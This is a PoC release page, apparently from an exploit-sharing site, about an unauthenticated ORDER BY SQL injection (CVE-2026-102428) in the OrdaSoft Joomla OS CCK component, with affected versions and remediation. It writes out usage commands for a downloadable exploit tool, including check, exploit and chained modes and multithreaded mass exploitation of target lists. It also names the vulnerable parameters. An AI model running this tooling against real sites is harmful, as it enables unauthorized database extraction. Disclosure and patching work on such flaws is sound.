POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Joomlacritical

CVE-2026-102428 — OrdaSoft Joomla CCK (com_os_cck) Unauthenticated ORDER BY SQLi

October 10, 2026 · 128 views

OrdaSoft OS CCK com_os_cck 1.0.0–8.3.15: public listing sort order_field/order_direction appended to SQL ORDER BY without column allow-list (CWE-89). Unauth error-based extract, check + mass exploit. CVSS 4.0 9.3 Critical. Fixed 8.3.16+ (same as CVE-2026-102427). Marker POCBIT-102428-OK.

#joomla#ordasoft#com_os_cck#cck#sqli#sql-injection#unauthenticated#cwe-89#critical#order-by

CVE:

CVE-2026-102428

Date:

2026-10-10

Severity:

CRITICAL

Exploit source

Full PoC repository on GitHub (public).

Description

Overview

CVE-2026-102428 — OrdaSoft Joomla Content Construction Kit (OS CCK) (com_os_cck) — unauthenticated SQL injection in public CCK record listings via order_field / order_direction (CWE-89).

| | | |---|---| | Affected | 1.0.0 – 8.3.15 | | Fix | ≥ 8.3.16 (same release as upload RCE CVE-2026-102427) | | CVSS 4.0 | 9.3 Critical — AV:N/AC:L/AT:N/PR:N/UI:N | | Verify marker | POCBIT-102428-OK |

Client-controlled sort keys are appended to ORDER BY without validating against real table columns. 8.3.16 adds an allow-list and safe ASC/DESC handling.

PoC page: https://pocbit.org/pocs/cve-2026-102428

GitHub: murrez/CVE-2026-102428

CVE.org: CVE-2026-102428

NVD: CVE-2026-102428

Related: CVE-2026-102427 — unauth upload RCE in the same component, fixed in 8.3.16.

Bundled tool (Python 3)

Download cve-2026-102428.py — writes poc.py, requirements.txt, targets.example.txt.

python cve-2026-102428.py
pip install -r requirements.txt

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --chain
python poc.py --list targets.example.txt --mode check -j 30 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --exploited-list exploited.txt

Exploit discovers public com_os_cck listing routes, primes sort, then error-based ORDER BY injection (MySQL). Vectors: order_field_get/post, order_direction_get/post. Example leak: POCBIT-102428-OK:8.0.36.

Discovery hints (your assets only)

body="com_os_cck"

Confirm version via administrator/components/com_os_cck/os_cck.xml and patch to ≥ 8.3.16.

Remediation

  1. Upgrade OS CCK to 8.3.16+.
  2. Patch both 102428 (SQLi) and 102427 (upload RCE) in one upgrade.
  3. Review WAF rules on public CCK listing parameters.

Legal and ethical use

Authorized security testing only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →